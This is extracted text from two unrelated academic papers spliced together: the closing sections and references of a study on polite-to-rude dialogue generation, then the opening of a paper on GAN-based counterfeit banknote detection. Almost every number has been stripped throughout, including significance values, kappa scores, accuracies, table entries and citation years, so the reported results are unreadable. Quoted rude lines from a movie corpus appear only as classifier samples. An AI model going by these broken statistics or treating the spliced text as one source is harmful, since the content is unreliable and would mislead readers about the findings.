significantly bet- ter in quality than retrieval, generic- and fu- sion.). moreover, the politeness levels of the lft and polite-rl models are statistically equal. there- fore, both models, with their training depth and mul- titasking trade-offs (see sec. ), can produce strong levels of stylistic content, without harming context- relevance. lastly, we can also see that our two retrieval- based models are both very polite (but not stat. sig- we test stat. significance via the bootstrap test (noreen, ; efron and tibshirani, ) with k samples. nificantly better over lft); and as expected, they both have dialogue quality lower than seq seq, polite-rl and lft (stat. significance of p < . ). they also feature two of the worst balances between average politeness and dialogue quality score. this is the type of sacrifice we want to avoid from im- posing on dialogue quality when building a stylistic dialogue model. for inter-annotator agreement, the kappa score was . (fair ) on dialogue quality and . (moderate) on politeness. if we employ a collapsed- likert version, where the more ambiguous and ex- treme scores of { , } and { , } are bucketed to- gether, we obtained a kappa score of . (mod- erate) on dialogue quality and . (moderate) on politeness. human evaluation results on -way lft mod- els we also present results on a -way politeness level comparison mturk study among the polite- lft, neutral-lft, and rude-lft models, i.e., the lft model with three levels (scores) of scaling the prepended style label, corresponding to polite- ness scores . , . and . , respectively (table , continuous-lft column). the table shows that polite-lft is significantly more polite than neutral- lft (stat. significance of p < . ), and neutral- lft is in turn more polite than rude-lft (stat. sig- nificance of p < . ). for inter-annotator agree- ment on this -way lft study, we get a kappa of . (moderate), and . (substantial) for the collapsed-likert case. we also experimented earlier with a discrete ver- sion of lft, where we treated responses in the [ . , . ] range as polite, [ . , . ] as neutral, and [ . , . ] as rude. instead of scaling a single label embedding with continuous politeness scores (as de- scribed in section . ), we assigned to each response one of these three labels with no scaling, accord- ing to its corresponding politeness bin. the human evaluation scores for that model were . , . and . , respectively, which features less score differ- ence between neutral and rude (table discrete- these levels were defined by landis and koch ( ); also see https://en.wikipedia.org/wiki/cohens_kappa as discussed in weijters et al. ( ), james et al. ( ), and https://en.wikipedia.org/wiki/likert_ scale, the ‘central tendency bias’ makes raters avoid using the two extreme response categories. continuous-lft discrete-lft polite . . neutral . . rude . . table : mturk human evaluation results on politeness level of lft models, for both the continuous and the discrete versions. lft column). automatic metric evaluation results as dis- cussed in sec. . , we also use some automatic eval- uation metrics to complement and verify the mturk human study results. in table , we present the av- erage politeness classifier and bleu- scores of re- sponses from each model. first, we can see that our politeness classifier agrees reasonably well with the human politeness judgments in table , since both identify the retrieval-based models and lft as the most polite, followed by polite-rl and fusion in descending order. 
we quantified this ‘agreement’ concretely, and found high correlation between the six human politeness scores (table politeness col- umn) and the six automatic classifier scores (ta- ble politeness score column): pearson correla- tion is . (stat. significance p = . ), and spearman’s rank-order correlation is . (p = . ). next, for bleu scores, although these scores (as percentages) are very low (consistent with the observation in ritter et al. ( ) and li et al. ( b)), their relative system-ranking still roughly agrees with that of human judgments — we found reasonably high correlation between human dia- logue quality and bleu (based on the six scores in table quality column and table bleu- col- umn): pearson correlation is . (stat. signifi- cance p = . ), and spearman’s rank-order cor- relation is . (p = . ). hence, overall, the automatic metric evaluation again shows that without politeness training, the base dialogue model produces neutral responses on average ( . score), while the retrieval-based mod- els and all three proposed generative models im- prove on politeness score. also, the bleu scores show, similar to the human study results in table , that among the three proposed models, the fusion model sacrifices the most dialog quality to become more polite, whereas the lft and rl models main- politeness score bleu- retrieval . . generic- . . seq seq . . fusion . . lft . . polite-rl . . table : automatic metrics: avg. politeness and bleu- scores for the two retrieval models, seq seq and three proposed models. also, the politeness score of neutral- lft and rude-lft are . , . , resp. top results are boldfaced. target sequence score polite examples well , thanks . that ’s . i appreciate that . . 〈num〉 , 〈num〉 of them in los angeles . i checked . nice work , though . . nah . i have curfew . he starts to walk away , then stops . quincy oh , by the way . congratulations . . thank you , ma’am . um , may i ask what this is regarding ? . hi , 〈person〉 . how are you ? . i know . amazing . . rude examples you really should pay more attention to what you read , 〈person〉 . . they were in a car accident . . you calling more of your stupid friends again ? ya prick . . are you a bad boy ? . then she ’s a liar . . excuse me , does that flask belong to this man ? . oh , well , excuse me all to hell . . table : analysis of politeness classifier: sampled re- sponses from movietriples dialogue corpus (without cherry-picking) and their politeness score. the double line separates polite and rude classified responses. tain comparable quality with improved politeness over the base model (seq seq). for the retrieval models, we again see that their politeness levels are better than lft and rl models, but with a corre- sponding loss in dialogue quality. analysis . analysis of politeness classifier we start our analysis by providing qualitative exam- ples of how well our politeness classifier performs on the target sequences from movietriples train dataset. this is important to check because the clas- sifier is trained on wikipedia (wiki) admin request messages, and while our lstm-cnn performs bet- input x: for what ? y: for forcing me to face my life honestly for the first time . retrieval x: what ’s the c . w . for ? generic- x: thanks for the answer . s s x: that ’s not true . fusion x: i do n’t know . i mean , it ’s just a feeling , but that ’s not what i ’m saying . lft x: you ’ll be fine . rl x: i wish i could . input x: no, but i wanted to. y: are you a total lying , scumsucking pig , 〈person〉 ? 
retrieval x: so 〈person〉 , what did it total out at ? generic- x: no problem . s s x: oh , that ’s ridiculous . fusion x: well , you ’re not a little funny . lft x: i do n’t think so , sir . rl x: you ’re hurting me ! input x: you ’re sweet to say so . y: pretty song . retrieval x: is there a song you do n’t know ? generic- x: can you clarify ? s s x: 〈person〉 , i know . fusion x: you ’re a good man . lft x: i love this song . rl x: you sound like a goddess . input x: i find it hard to believe myself . y: his lips , unused as they are to such a contortion , twisted and stretched . into a smile . retrieval x: thank you . and always smile . generic- x: nice . s s x: how can you be so sure ? fusion x: you ’re a good man , mr . lft x: your lips are well . rl x: your lips are so beautiful . table : output dialogue response examples by retrieval, generic- , seq seq (denoted as s s) and the genera- tive polite models fusion, lft, and rl (shows conversa- tion history turns of x and y, and then the generated rd turn response by x). ter on cross-domain stack exchange (se) data, the movietriples dialogue corpus is still quite differ- ent and diverse in domain from both wiki and se. hence, it is important to have a reasonably accurate politeness classifier such that it can provide useful labels and rewards for our polite-dialogue models. table presents some randomly-selected (i.e., non- cherry-picked) responses from movietriples and their politeness classifier scores. we can see that the classifier provides a reasonably correct score a majority of the time, capturing several psycholin- guistic politeness strategies mentioned in danescu- i am sorry i really am sorry , . yes sir i will take care of it . you are a smart looking guy . figure : saliency heatmaps of the classifier’s attention (reward for sampled responses in polite-rl model). niculescu-mizil et al. ( ), e.g., positive ones such as gratitude, deference, greeting, positive lexi- con, indirection, indicative modal, and negative ones such as negative lexicon, direct question, direct start, nd person start. however, it does occasionally give strongly polite or rude scores to some mild or neu- tral responses, e.g., “they were in a car accident”, showing scope for classifier improvements. . output examples of stylistic dialogue next, we show some output examples of our polite dialogue models w.r.t. the base seq seq model as well as the retrieval-based models. we use these ex- amples to demonstrate the politeness strategies our proposed generative models have learned (in ta- ble ). in the first example, our stylistic models use politeness strategies such as indirection, pos- itive lexicon and counterfactual modal (danescu- niculescu-mizil et al., ). this example also illustrates the behavior of the retrieval model, i.e., most of the time it just outputs an utterance that has word overlap with but totally irrelevant to the con- text. thus although all its retrieved responses have oracle-level fluency and grammaticality, its average dialogue quality score in the human evaluation is still not as good as that of seq seq. in the second example, fusion uses indirection, while lft is being polite even when disagreeing with the abusive language from y . this example also shows that generic- , due to its limited space for retrieval, oftentimes fails to provide a relevant answer, although it is the most polite one since its candidate responses are manually picked. in the third example, fusion and lft both use positive lex- icon, and rl makes a compliment. 
in the fourth ex- ample, each of the three proposed models uses pos- itive lexicon. it is worth noting that in the last ex- ample, while lft and polite-rl seem to provide a relevant compliment, they are actually compliment- ing the wrong person. this kind of issue motivates us toward creating persona-based (li et al., c) politeness models for future work. . visualization of polite-rl reward using derivative saliency (simonyan et al., ; li et al., a; aubakirova and bansal, ), we also visualize how much each token in the sampled re- sponse contributes to the classifier’s reward during polite-rl model’s training. fig. shows three such heatmaps that correspond to the magnitudes of the derivative in absolute value with respect to each di- mension. the figures clearly show that the classifier has learned to identify multiple politeness strategies, e.g., “smart” (deference), “sir” (polite address), and the two “sorry”s (apologizing). conclusion and future work we first presented three diverse generative mod- els that can generate rich polite-to-rude spectrum dialogue responses (based on the politeness theo- ries by brown and levinson ( )), without us- ing any parallel data (which is usually assumed for tasks such as machine translation) and only relying on a style classifier. via multiple human evalua- tion studies and automatic metrics, we demonstrated that all three models generate more polite responses (displaying several politeness strategies discussed in previous psycholinguistic works), while lft and polite-rl are able to do so without losing dialogue quality, as opposed to the fusion model as well as the two retrieval-based models. in future work, there is still much room for im- provement on the politeness as well as dialogue quality side, and one could employ more recent, ad- vanced models such as variational, adversarial, and decoder-regulation techniques. though we focused on politeness for the scope of this paper, our models can be easily generalized to other emotion and personality styles (only relying on a style classifier), hopefully contributing towards the valuable paradigm of human-like and engaging intelligent tutors and personal assistants. in future work, our polite-rl model could also be extended to stylistic task-based dialogue generation, where both content preservation and style transfer are needed, potentially by disentangling politeness and content of the generated response and then only feeding the politeness portion to the classifier for rl training. acknowledgments we thank the action editor and the anonymous re- viewers for their helpful comments and discussions. this work was supported by darpa (yfa - d ap ), facebook parlai research award, google faculty research award, bloomberg data science research grant, and nvidia gpu awards. the views, opinions, and/or findings contained in this article are those of the authors and should not be interpreted as representing the official views or policies, either expressed or implied, of the funding agency. references david ameixa, luisa coheur, pedro fialho, and paulo quaresma. . luke, i am your father: dealing with out-of-domain requests by using movies subti- tles. in international conference on intelligent virtual agents, pages – . springer. ron artstein and massimo poesio. . inter-coder agreement for computational linguistics. computa- tional linguistics, ( ): – . malika aubakirova and mohit bansal. . interpret- ing neural networks to improve politeness compre- hension. 
in proceedings of the conference on empirical methods in natural language processing, pages – . dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learning to align and translate. in proceedings of in- ternational conference on learning representations, pages – . penelope brown and stephen c. levinson. . polite- ness: some universals in language usage, volume . cambridge university press. michael buhrmester, tracy kwang, and samuel d. gosling. . amazon’s mechanical turk: a new source of inexpensive, yet high-quality, data? per- spectives on psychological science, ( ): – . jacob cohen. . weighted kappa: nominal scale agreement provision for scaled disagreement or partial credit. psychological bulletin, ( ): – . ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel kuksa. . natural language processing (almost) from scratch. journal of machine learning research, (aug): – . cristian danescu-niculescu-mizil, moritz sudhof, dan jurafsky, jure leskovec, and christopher potts. . a computational approach to politeness with appli- cation to social factors. in proceedings of the st annual meeting of the association for computational linguistics, pages – . daxiang dong, hua wu, wei he, dianhai yu, and haifeng wang. . multi-task learning for multi- ple language translation. in proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : long pa- pers), pages – . bradley efron and robert j. tibshirani. . an intro- duction to the bootstrap. crc press. jessica ficler and yoav goldberg. . controlling linguistic style aspects in neural language generation. in proceedings of the workshop on stylistic variation, pages – . zhenxin fu, xiaoye tan, nanyun peng, dongyan zhao, and rui yan. . style transfer in text: exploration and evaluation. in proceedings of the thirty-second aaai conference on artificial intelligence (aaai- ), pages – . michel galley, chris brockett, alessandro sordoni, yangfeng ji, michael auli, chris quirk, margaret mitchell, jianfeng gao, and bill dolan. . deltableu: a discriminative metric for generation tasks with intrinsically diverse targets. in proceed- ings of the rd annual meeting of the association for computational linguistics and the th interna- tional joint conference on natural language process- ing (short papers), pages – . leon a. gatys, alexander s. ecker, and matthias bethge. . image style transfer using convolutional neu- ral networks. in proceedings of the ieee conference on computer vision and pattern recognition, pages – . sayan ghosh, mathieu chollet, eugene laksana, louis- philippe morency, and stefan scherer. . affect- lm: a neural language model for customizable affec- tive text generation. in proceedings of the th annual meeting of the association for computational linguis- tics (volume : long papers), pages – . xavier glorot and yoshua bengio. . understanding the difficulty of training deep feedforward neural net- works. in proceedings of the international conference on artificial intelligence and statistics (aistats’ ). society for artificial intelligence and statistics, pages – . sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . zhiting hu, zichao yang, xiaodan liang, ruslan salakhutdinov, and eric p. xing. . toward controlled generation of text. in proceedings of the th international conference on machine learning, pmlr , pages – . 
lawrence r. james, robert g. demaree, and gerrit wolf. . estimating within-group interrater reliability with and without response bias. journal of applied psychology, ( ): . harsh jhamtani, varun gangal, eduard hovy, and eric nyberg. . shakespearizing modern language us- ing copy-enriched sequence-to-sequence models. in proceedings of the workshop on stylistic variation, pages – . melvin johnson, mike schuster, quoc v. le, maxim krikun, yonghui wu, zhifeng chen, nikhil thorat, fernanda viégas, martin wattenberg, greg corrado, macduff hughes, and jeffrey dean. . google’s multilingual neural machine translation system: en- abling zero-shot translation. transactions of the asso- ciation for computational linguistics, v. , pages – . rafal jozefowicz, oriol vinyals, mike schuster, noam shazeer, and yonghui wu. . exploring the limits of language modeling. corr abs/ . . yuta kikuchi, graham neubig, ryohei sasano, hiroya takamura, and manabu okumura. . controlling output length in neural encoder-decoders. in proceed- ings of the conference on empirical methods in natural language processing, pages – . taeksoo kim, moonsu cha, hyunsoo kim, jungkwon lee, and jiwon kim. . learning to discover cross-domain relations with generative adversarial net- works. in proceedings of the th international con- ference on machine learning, pages – . diederik kingma and jimmy ba. . adam: a method for stochastic optimization. in proceedings of international conference on learning representa- tions. catherine kobus, josep crego, and jean senellart. . domain control for neural machine translation. in proceedings of recent advances in natural language processing, pages – . j. richard landis and gary g. koch. . the mea- surement of observer agreement for categorical data. biometrics, pages – . jiwei li, xinlei chen, eduard hovy, and dan jurafsky. a. visualizing and understanding neural models in nlp. in proceedings of north american chapter of the association for computational linguistics-hlt, pages – . jiwei li, michel galley, chris brockett, jianfeng gao, and bill dolan. b. a diversity-promoting objec- tive function for neural conversation models. in pro- ceedings of north american chapter of the associa- tion for computational linguistics-hlt, pages – . jiwei li, michel galley, chris brockett, jianfeng gao, and bill dolan. c. a persona-based neural con- versation model. in proceedings of the th annual meeting of the association for computational linguis- tics, pages – . rensis likert. . a technique for the measurement of attitudes. archives of psychology. ming-yu liu and oncel tuzel. . coupled genera- tive adversarial networks. in advances in neural in- formation processing systems, pages – . chia-wei liu, ryan lowe, iulian v. serban, michael noseworthy, laurent charlin, and joelle pineau. . how not to evaluate your dialogue system: an empirical study of unsupervised evaluation metrics for dialogue response generation. in proceedings of the conference on empirical methods in natural language processing, pages – . ming-yu liu, thomas breuel, and jan kautz. . unsupervised image-to-image translation networks. in proceedings of the conference on empiri- cal methods in natural language processing, pages – . ryan lowe, nissan pow, iulian v. serban, and joelle pineau. . the ubuntu dialogue corpus: a large dataset for research in unstructured multi-turn di- alogue systems. in proceedings of the th annual meeting of the special interest group on discourse and dialogue (sigdial ), pages – . 
ryan lowe, michael noseworthy, iulian v. serban, nicolas angelard-gontier, yoshua bengio, and joelle pineau. . towards an automatic turing test: learning to evaluate dialogue responses. in proceed- ings of the th annual meeting of the association for computational linguistics, pages – . yi luan, chris brockett, bill dolan, jianfeng gao, and michel galley. . multi-task learning for speaker- role adaptation in neural conversation models. in pro- ceedings of the th international joint conference on natural language processing, pages – . minh-thang luong, quoc v. le, ilya sutskever, oriol vinyals, and lukasz kaiser. . multi-task se- quence to sequence learning. in proceedings of in- ternational conference on learning representations. françois mairesse and marilyn walker. . person- age: personality generation for dialogue. in proceed- ings of the th annual meeting of the association of computational linguistics, pages – . tomas mikolov, kai chen, greg corrado, and jeffrey dean. . efficient estimation of word representa- tions in vector space. in proceedings of international conference on learning representations workshop. jonas mueller, david gifford, and tommi jaakkola. . sequence to better sequence: continuous revi- sion of combinatorial structures. in international con- ference on machine learning, pages – . eric w. noreen. . computer-intensive methods for testing hypotheses. wiley new york. kishore papineni, salim roukos, todd ward, and wei- jing zhu. . bleu: a method for automatic evaluation of machine translation. in proceedings of the th annual meeting on association for computa- tional linguistics, pages – . romain paulus, caiming xiong, and richard socher. . a deep reinforced model for abstractive sum- marization. in proceedings of international confer- ence on learning representations. juan ramos. . using tf-idf to determine word relevance in document queries. in proceedings of the first instructional conference on machine learning, volume , pages – . marc’aurelio ranzato, sumit chopra, michael auli, and wojciech zaremba. . sequence level training with recurrent neural networks. in proceedings of in- ternational conference on learning representations. steven j rennie, etienne marcheret, youssef mroueh, jarret ross, and vaibhava goel. . self-critical sequence training for image captioning. in ieee conference on computer vision and pattern recogni- tion, page . alan ritter, colin cherry, and william b. dolan. . data-driven response generation in social media. in proceedings of the conference on empirical methods in natural language processing, pages – . mike schuster and kuldip k paliwal. . bidirec- tional recurrent neural networks. ieee transactions on signal processing, ( ): – . rico sennrich, barry haddow, and alexandra birch. a. controlling politeness in neural machine trans- lation via side constraints. in proceedings of north american chapter of the association for computa- tional linguistics, pages – . rico sennrich, barry haddow, and alexandra birch. b. improving neural machine translation mod- els with monolingual data. in proceedings of the th annual meeting of the association for computational linguistics, pages – . iulian vlad serban, alessandro sordoni, yoshua bengio, aaron c. courville, and joelle pineau. . build- ing end-to-end dialogue systems using generative hier- archical neural network models. in the thirtieth aaai conference on artificial intelligence (aaai- ), pages – . yuanlong shao, stephan gouws, denny britz, anna goldie, brian strope, and ray kurzweil. . 
gen- erating high-quality and informative conversation re- sponses with sequence-to-sequence models. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – . tianxiao shen, tao lei, regina barzilay, and tommi jaakkola. . style transfer from non-parallel text by cross-alignment. in advances in neural informa- tion processing systems, pages – . karen simonyan, andrea vedaldi, and andrew zisser- man. . deep inside convolutional networks: visualising image classification models and saliency maps. arxiv preprint arxiv: . . georgios p. spithourakis, isabelle augenstein, and se- bastian riedel. . numerically grounded language models for semantic error correction. in proceedings of the conference on empirical methods in nat- ural language processing, pages – . richard s. sutton, david mcallester, satinder singh, and yishay mansour. . policy gradient methods for reinforcement learning with function approximation. in advances in neural information processing sys- tems , pages – . mit press. yaniv taigman, adam polyak, and lior wolf. . unsupervised cross-domain image generation. arxiv preprint arxiv: . . subhashini venugopalan, lisa anne hendricks, ray- mond j. mooney, and kate saenko. . improving lstm-based video description with linguistic knowl- edge mined from text. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – . di wang, nebojsa jojic, chris brockett, and eric ny- berg. . steering output style and topic in neural response generation. in proceedings of the con- ference on empirical methods in natural language processing, pages – . bert weijters, elke cabooter, and niels schillewaert. . the effect of rating scale format on response styles: the number of response categories and re- sponse category labels. international journal of re- search in marketing, ( ): – . ronald j williams. . simple statistical gradient- following algorithms for connectionist reinforcement learning. in reinforcement learning, pages – . springer. wei xu, alan ritter, bill dolan, ralph grishman, and colin cherry. . paraphrasing for style. in proceedings of the th international conference on computational linguistics, pages – . hayahide yamagishi, shin kanouchi, takayuki sato, and mamoru komachi. . controlling the voice of a sentence in japanese-to-english neural machine trans- lation. in proceedings of the rd workshop on asian translation (wat ), pages – . zili yi, hao zhang, ping tan, and minglun gong. . dualgan: unsupervised dual learning for image-to- image translation. in proceedings of international conference on computer vision. tiancheng zhao, ran zhao, and maxine eskenazi. . learning discourse-level diversity for neural dialog models using conditional variational autoencoders. in proceedings of the th annual meeting of the associ- ation for computational linguistics (volume : long papers), pages – . chunting zhou, chonglin sun, zhiyuan liu, and francis lau. . a c-lstm neural network for text classi- fication. arxiv preprint arxiv: . . jun-yan zhu, taesung park, phillip isola, and alexei a. efros. . unpaired image-to-image translation us- ing cycle-consistent adversarial networks. in proceed- ings of international conference on computer vision. submitted november accepted july published september corresponding author toqeer ali, toqeer@iu.edu.sa academic editor diego amancio additional information and declarations can be found on page doi . /peerj-cs. copyright ali et al. distributed under creative commons cc-by . 
open access deepmoney: counterfeit money detection using generative adversarial networks toqeer ali , salman jan , ahmad alkhodre , mohammad nauman , muhammad amin and muhammad shoaib siddiqui faculty of computer and information systems, islamic university of madinah, madinah, saudi arabia malaysian institute of information technology, university kuala lumpur, kuala lumpur, malaysia faculty of computer and information systems, islamic university of madinah, madinah, saudi arabia computer science, fast-nuces, peshawar, pakistan abstract conventional paper currency and modern electronic currency are two important modes of transactions. in several parts of the world, conventional methodology has clear precedence over its electronic counterpart. however, the identification of forged currency paper notes is now becoming an increasingly crucial problem because of the new and improved tactics employed by counterfeiters. in this paper, a machine assisted system—dubbed deepmoney—is proposed which has been developed to discriminate fake notes from genuine ones. for this purpose, state-of-the-art models of machine learning called generative adversarial networks (gans) are employed. gans use unsupervised learning to train a model that can then be used to perform supervised predictions. this flexibility provides the best of both worlds by allowing unlabelled data to be trained on whilst still making concrete predictions. this technique was applied to pakistani banknotes. state-of-the-art image processing and feature recognition techniques were used to design the overall approach of a valid input. augmented samples of images were used in the experiments which show that a high-precision machine can be developed to recognize genuine paper money. an accuracy of % has been achieved. the code is available as an open source to allow others to reproduce and build upon the efforts already made. subjects data mining and machine learning, data science keywords deep learning, counterfeit money, generative adversarial networks introduction currency is a common system to perform transactions for trading or exchange of goods among people. various currencies are recognized for trading between nations in foreign exchange markets. the problem with paper currency is that it may be counterfeit. counterfeit is imitation money which is produced without the legal sanction of the state or government, considered as fraud (derrida, ). anti-counterfeiting measures can be adopted which involve the fine details of the raised intaglio printing on notes which allows non-experts to easily spot forgeries (tanaka, nishiyama & koyama, ). with advancement in technology, fakes and forgery rates are increasing. in , almost % of the $ million in counterfeit currency circulating in the u.s was made using how to cite this article ali t, jan s, alkhodre a, nauman m, amin m, siddiqui ms. . deepmoney: counterfeit money detection us- ing generative adversarial networks. peerj comput. sci. :e http://doi.org/ . /peerj-cs. mailto:toqeer@iu.edu.sa https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. digital printing technologies (murakami-fester, ; bartkiewicz et al., ). as reported by bloomberg news, a -year-old hairstylist forged up to $ , in counterfeit notes (magdaleno, ). 
another research carried out by gallup in pakistan found out that more than a quarter of the population ( %) have received counterfeit money while buying items from the market. elsewhere, a raid by peshawar police yielded fake documents and . million in counterfeit currency notes. the chairman and managing director of a security printing corporation in pakistan said that enemy countries were producing counterfeit notes of pakistani rupee which was being used exclusively for terrorist activities in the country (shoaib et al., ; taillard, ). the state bank of pakistan has carried out various types of campaigns to raise awareness of the security features of bank notes, both directly to its customers and in collaboration with other banks. bank’s efforts to raise awareness amongst the general public involve a media campaign and a mobile application that detects counterfeit notes. the awareness of the security features of bank notes in public may help some people identify counterfeit notes; however, most of the public, especially people who are illiterate, are not able to differentiate between a forged currency note and a genuine one. also, these features are hard to recognized by human eye or touch when the currency notes are old, dirty, and damaged. to solve the issues in classifying a currency note as a fake or a genuine note, we have proposed a machine assisted system named deepmoney. for discriminating fake notes from genuine ones, state-of-the-art models of machine learning called generative adversarial networks (gans) are employed. gans use an unsupervised learning to train a model that can then be used to perform supervised predictions. this flexibility provides the best of both worlds by allowing unlabelled data to be trained on whilst still making concrete predictions. this technique is applied to pakistani banknotes. state-of-the-art image processing and feature recognition techniques were used to design the overall approach of a valid input. the rest of paper is organized as follows. ‘related work’ discusses the related work and provides details of various deep learning models in the subject domain. ‘proposed solution’ provides details of the proposed solution and how the dataset was developed. ‘results’ presents the results and evaluation details of employing models on the dataset. the paper is concluded in ‘conclusion’. related work bearing the aforementioned issues in mind, a number of research solutions have been provided in the past to check the validity of the banknotes (thakur & kaur, ; mirza & nanda, a; chakraborty et al., ; prasanthi & setty, ; kang & lee, ). mirza & nanda ( b) offered a solution for a currency verification system using image processing based on the extraction of characteristics. the solution was applied to indian banknotes. the edge detection and image segmentation were used to make a comparison between the original and the counterfeit notes. snehlata et al. presented a uml activity model designed to represent the dynamic aspects for identification of fake currency for rs currency note for indian rupee. they have used class descriptions for real and fake images of the currency for security threads in the ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. form of strips and apply comparison of block pixels to identify fake and real currency (snehlata & saxena, ). singh et al. have presented an image processing-based approach for detecting forged indian currency. 
the authors have utilized security thread and latent image, embedded on the note to identify forgery. first the security features are extracted and encoded, then a clustering algorithm, k-means is applied for classification. then the latent image, segmented via template matching is encoded using hog descriptor and classified with an svm model to predict if the note is fake or real singh, ozarde & abhiram ( ). abburu et al. ( ) proposed a system for automated currency recognition using image processing techniques for accurately identifying both the country of origin and the denomination of a given banknote. however, they do not discriminate between a fake and a real currency note. however, the deepmoney solution proposed here does not use image processing and differs in many ways. ross et al. ( ) have proposed a database for detecting counterfeit items using digital fingerprint records which can be used for detecting counterfeit currency note. it takes an image of the authentication region and creates a digital fingerprint of the object. it uses signal processing techniques, such as, fft of the image to create the digital fingerprint to extract features which are used to compare the fake and real objects. kayani presents a bank note processing system based on florescence and phosphorescence detection (kayani, ). the illumination source is used to direct light on a note and the sensors measures the florescence and phosphorescence that are used to identify if the note is fake or real. micali & devadas ( ) proposed a solution for counterfeit prevention using physically unclonable value for unique identification for each currency note. phillips has presented a miniature counterfeit detector in his patent (phillips, ). it applies multiple test to assure the authenticity of a currency note. back light illuminators are used for visual inspection of the watermarks, florescent and anti-counterfeiting features. sensors, such as, magnetic ink sensor, are used to detect the magnetic ink based security features on the note. however, some of the features are detected but with old notes the rate of false negative would be high. alicherry has given a digital signature based solution for verifying the authenticity of a currency note and tracking duplicate notes. a digital signature based on the serial number of the currency note is attached to the currency note and people can query the authenticity of the note by sending a photograph of the note to a centralized server for verification and tracking alicherry ( ). before gans (goodfellow et al., ), a neural network approach was used to authenticate banknotes (mohamad et al., ). in this research, generative models to train a neural network are preferred. python has also been used to develop and implement a framework for the identification of pakistani currency. berenguel et al. ( ) also worked on methods by which to identify genuine and photocopied bank notes. the technique applied was to differentiate the texture between the original and photocopied notes. other studies choi et al. ( ) also worked on the detection of counterfeit banknotes by using optical coherence tomography (oct). ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. to differentiate between genuine and counterfeit notes, the researchers used a three- dimensional imaging security feature according to the ff-oct system. their results show that it is possible to recognize original notes with the deepmoney technique. 
however, their technique was based on a particular feature of specific banknotes which may prove to be less effective on other notes. this also differs from the deepmoney perspective of recognizing banknotes. table elaborates some recent research work regarding counterfeit money. there have been a few solutions provided which use machine learning techniques. for example, hassanpour & farahabadi ( ) used hidden markov models for the recognition of banknotes. in the following subsection, we discuss some of the deep learning model that could be utilized in the field of identifying currency forgery and counterfeit currency. deep learning models some of the best known deep learning models in comparison to our proposed gans model on the grounds for selecting the one which will offer the most robust results, are discussed in the following subsections. recurrent neural networks a number of techniques exist in traditional machine learning and deep learning which allow patterns in sequences and contents to be learned. a recurrent neural network is one such technique. context sensitive and inherently ordered data is used in this network. the network can operate with both audio and text input. recurrent neural networks are adept at handling arbitrary length sequence data. this network is a powerful tool which requires the sequence to be contextual. recurrent neural networks are still very dominant although, in the past, they were very hard to train. however, there is now a solution, hessian-free optimization, which offers the ability to train recurrent neural networks. the model is depicted in fig. . fully connected neural networks as its name indicates, a fully connected neural network is one in which all the neurons are connected to the next layer of neurons. there are many layers such as the max pooling and the convolutional layers. the high level perception in these networks uses only one type of layer and these layers are fully connected. these connected layers in the neurons link to all the activations in the previous layers. the activation function may also be calculated by the multiplication of a matrix trailed by a network’s set, also known as bias. a fully connected neural network has an input layer, a hidden layer and an output layer as depicted in fig. . convolutional neural network this type of neural network processes the dimensioned and order data in different ways. convolutional neural networks (krizhevsky, sutskever & hinton, ) are learned through the same method as the stochastic gradient descent method traditionally learns. the following are the convolutional neural network layers: ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table related work done in the recent years in the field of counterfeit currency detection. authors objective method limitations year thakur & kaur ( ) review of fake currency detection techniques survey paper not applicable chakraborty et al. 
( ) recent developments in paper currency recognition system survey paper not applicable prasanthi & setty ( ) indian paper currency authentication system image processing performance is less than machine learning based systems kang & lee ( ) fake banknote detection multispectral imaging sensors feature extraction and classifica- tion require high computation mirza & nanda ( a) currency verification image processing: edge detection and image segmentation only for indian notes snehlata & saxena ( ) fake currency identification uml activity model using class descriptors only for rs note of indian currency singh, ozarde & abhiram ( ) detecting forged indian currency image processing, k-means clustering and svm as a classifier limited to rs note of indian currency abburu et al. ( ) automated currency recognition for identifying country of origin and denomination image processing cannot detect counterfeit or forgery ross et al. ( ) database for detecting counterfeit items digital fingerprint records using images of security features performance is less than ma- chine learning based systems kayani ( ) bank note processing system florescence and phosphores- cence detection many security features are not detectable using florescence and phosphorescence detection micali & devadas ( ) counterfeit prevention physically unclonable value for unique identification for each currency note needs internet connection for sending images to centralized server phillips ( ) miniature counterfeit detector back light illuminators are used for visual inspection of the watermarks, florescent and anti- counterfeiting features many security features are not detectable using florescence and phosphorescence detection alicherry ( ) verifying the authenticity of a currency note and tracking duplicate notes digital signature based on the serial number of the currency note needs internet connection for sending images to centralized server berenguel et al. ( ) identify genuine bank notes differentiate the texture between the original and photocopied notes using oft accuracy is less than machine learning based systems choi et al. ( ) counterfeit detection characterization of safety fea- ture on banknote with full-field optical coherence tomography accuracy is less than machine learning based systems hassanpour & farahabadi ( ) paper currency recognition machine learning: hidden markov models accuracy is less than the proposed system mohamad et al. ( ) banknote authentication srtificial neural network accuracy is less than the proposed system convolutional in this layer there is a grid of neurons. commonly, this grid is rectangular which requires that the previous layer should also take the form of the same rectangular shaped grid. in the convolutional layer, the neurons have the same weight. each neuron takes the input from the rectangular section with the input coming from the previous layer. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure a recurrent neural network. full-size doi: . /peerjcs. /fig- figure a fully connected neural network. full-size doi: . /peerjcs. /fig- max-pooling pooling layers are present after each convolutional layer. the layer usually grabs tiny rectangular blocks from the convolutional layer and then samples them so that only one output is created. 
